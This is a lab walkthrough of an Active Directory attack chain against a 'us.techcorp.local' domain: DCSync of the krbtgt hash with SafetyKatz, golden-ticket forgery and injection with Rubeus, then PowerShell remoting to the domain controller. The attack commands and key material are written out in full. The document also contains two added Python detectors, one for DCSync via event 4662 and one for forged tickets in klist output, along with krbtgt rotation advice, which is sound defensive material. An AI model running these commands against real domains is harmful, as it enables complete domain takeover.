
Let’s Extract the Krbtgt Hash
.\SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt /domain:us.techcorp.local"
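From the defender's side, the DCSync step above shows up on the domain controller as Security event 4662 with the directory-replication control access rights in its Properties field, requested by a principal that is not a DC. The following Python is an added detection example, not part of this writeup or of the tools it uses: the three 4662 records and the account name "studentuser" are constructed, the replication-right GUIDs are the well-known AD schema values, and the list of expected replicators is an assumed allow-list you would build from your own DC inventory.

```python
"""Detect directory-replication requests (the DCSync technique shown above)
in Windows Security event 4662 records.  Added example for this writeup,
not part of the original page; the events below are constructed."""
import re

# Control-access-right GUIDs for AD replication (well-known schema values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Principals that legitimately replicate: DC machine accounts.  Assumed
# allow-list for this example; populate it from your own DC inventory.
EXPECTED_REPLICATORS = {"US-DC$", "US-DC2$"}

GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Constructed 4662 events in the shape of the parsed EventData fields.
# Event 0: a DC replicating (expected).  Event 1: a user account asking
# for Get-Changes + Get-Changes-All (DCSync pattern).  Event 2: unrelated.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "US-DC2$", "SubjectDomainName": "US",
     "AccessMask": "0x100", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "%%7688\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Computer": "US-DC.us.techcorp.local", "TimeCreated": "2019-07-05T00:40:12"},
    {"EventID": 4662, "SubjectUserName": "studentuser", "SubjectDomainName": "US",
     "AccessMask": "0x100", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Computer": "US-DC.us.techcorp.local", "TimeCreated": "2019-07-05T00:41:03"},
    {"EventID": 4662, "SubjectUserName": "studentuser", "SubjectDomainName": "US",
     "AccessMask": "0x20", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "%%7685\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Computer": "US-DC.us.techcorp.local", "TimeCreated": "2019-07-05T00:41:30"},
]


def replication_rights(event):
    """Return the names of replication rights referenced by a 4662 event."""
    if event.get("EventID") != 4662:
        return []
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)


def find_dcsync(events, expected=EXPECTED_REPLICATORS):
    """Flag replication requests made by principals that are not known DCs."""
    allowed = {e.upper() for e in expected}
    findings = []
    for ev in events:
        rights = replication_rights(ev)
        if not rights:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in allowed:
            continue
        findings.append({
            "time": ev.get("TimeCreated"),
            "subject": f"{ev.get('SubjectDomainName', '')}\\{subject}",
            "dc": ev.get("Computer"),
            "rights": rights,
        })
    return findings


if __name__ == "__main__":
    for f in find_dcsync(SAMPLE_EVENTS):
        print(f"{f['time']} {f['subject']} on {f['dc']}: {', '.join(f['rights'])}")
```

Event 4662 is only written when the "Audit Directory Service Access" subcategory is enabled and the domain object carries a SACL for the replication rights, so the check is silent on a DC that does not audit them. Also remember that the mitigation for a krbtgt hash that has already been extracted is rotating the krbtgt password twice, since a forged ticket stays valid for as long as the key it was signed with is accepted.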

Now let’s forge a ticket for the administrator user
.\\Rubeus.exe golden /user:Administrator /domain:us.techcorp.local /aes256:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5 /sid:S-1-5-21-210670787-2521448726-163245708 /ldap /printcmd

Let’s copy this command and try it
C:\AD\Tools\Rubeus.exe golden /aes256:5E3D2096ABB01469A3B0350962B0C65CEDBBC611C5EAC6F3EF6FC1FFA58CACD5 /user:Administrator /id:500 /pgid:513 /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /pwdlastset:"7/5/2019 12:42:09 AM" /minpassage:1 /badpwdcount:2 /logoncount:755 /netbios:US /groups:544,512,520,513 /dc:US-DC.us.techcorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt

Now let’s list the tickets
klist
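The same klist output a host-based check would look at can be audited for signs of a forged TGT: a lifetime or renewable lifetime longer than the domain policy allows, or a TGT sitting in the cache with no KDC recorded for it. The Python below is an added example written for this writeup, not code from the page or from Rubeus; the klist text is constructed to mirror the layout of real klist output (ticket #0 is given a ten-year lifetime, ticket #1 is a normally issued TGT, and the account "studentuser" is made up), the timestamp format is assumed to be the US-locale M/D/YYYY H:MM:SS layout, and the empty "Kdc Called" heuristic is an assumption, not a documented indicator.

```python
"""Audit cached Kerberos tickets from `klist` output for signs of a forged TGT.
Added example for this writeup, not part of the original page.  The klist
text below is constructed to mirror the layout of real klist output."""
import re
from datetime import datetime, timedelta

# Constructed sample: ticket #0 has a ten-year lifetime and no KDC recorded;
# ticket #1 looks like a TGT issued under default domain policy.
SAMPLE_KLIST = """\
Current LogonId is 0:0x3e7

Cached Tickets: (2)

#0>     Client: Administrator @ US.TECHCORP.LOCAL
        Server: krbtgt/us.techcorp.local @ US.TECHCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 7/5/2019 12:42:09 (local)
        End Time:   7/2/2029 12:42:09 (local)
        Renew Time: 7/2/2029 12:42:09 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: studentuser @ US.TECHCORP.LOCAL
        Server: krbtgt/us.techcorp.local @ US.TECHCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 7/5/2019 9:00:00 (local)
        End Time:   7/5/2019 19:00:00 (local)
        Renew Time: 7/12/2019 9:00:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: US-DC.us.techcorp.local
"""

TICKET_RE = re.compile(r"#(\d+)>(.*?)(?=\n#\d+>|\Z)", re.S)
FIELD_RE = re.compile(
    r"^[ \t]*(Client|Server|Start Time|End Time|Renew Time|Kdc Called):[ \t]*(.*?)[ \t]*$",
    re.M)
TIME_RE = re.compile(r"\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2}")


def parse_time(value):
    """Parse a klist timestamp; assumes the US-style M/D/YYYY H:MM:SS layout."""
    m = TIME_RE.search(value)
    return datetime.strptime(m.group(0), "%m/%d/%Y %H:%M:%S") if m else None


def parse_klist(text):
    """Return one dict per cached ticket with the fields the audit needs."""
    tickets = []
    for num, body in TICKET_RE.findall(text):
        fields = dict(FIELD_RE.findall(body))
        tickets.append({
            "index": int(num),
            "client": fields.get("Client", ""),
            "server": fields.get("Server", ""),
            "start": parse_time(fields.get("Start Time", "")),
            "end": parse_time(fields.get("End Time", "")),
            "renew": parse_time(fields.get("Renew Time", "")),
            "kdc": fields.get("Kdc Called", ""),
        })
    return tickets


def audit_klist(text, max_ticket_age=timedelta(hours=10),
                max_renew_age=timedelta(days=7)):
    """Flag tickets inconsistent with domain policy.  The defaults are the
    Windows defaults for MaxTicketAge (10 h) and MaxRenewAge (7 days)."""
    findings = []
    for t in parse_klist(text):
        def flag(reason, t=t):
            findings.append({"ticket": t["index"], "client": t["client"], "reason": reason})
        if t["start"] and t["end"] and t["end"] - t["start"] > max_ticket_age:
            flag("lifetime exceeds MaxTicketAge")
        if t["start"] and t["renew"] and t["renew"] - t["start"] > max_renew_age:
            flag("renewable lifetime exceeds MaxRenewAge")
        # Heuristic (assumption): a TGT injected into the cache rather than
        # obtained from a KDC has no 'Kdc Called' value recorded.
        if t["server"].lower().startswith("krbtgt/") and not t["kdc"]:
            flag("TGT cached without a KDC exchange")
    return findings


if __name__ == "__main__":
    for f in audit_klist(SAMPLE_KLIST):
        print(f"ticket #{f['ticket']} ({f['client']}): {f['reason']}")
```

A forged ticket whose start, end and renew times are chosen to match the domain's policy will pass the two lifetime checks, so treat them as one signal among several; the stronger control is still the one on the DC side, namely detecting the krbtgt extraction and rotating the krbtgt key so that tickets signed with the old one stop validating.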

As we can see, we now have a TGT for the Administrator user in the cache.
Let's PS-Remote to US-DC using that ticket
Enter-PSSession -ComputerName us-dc
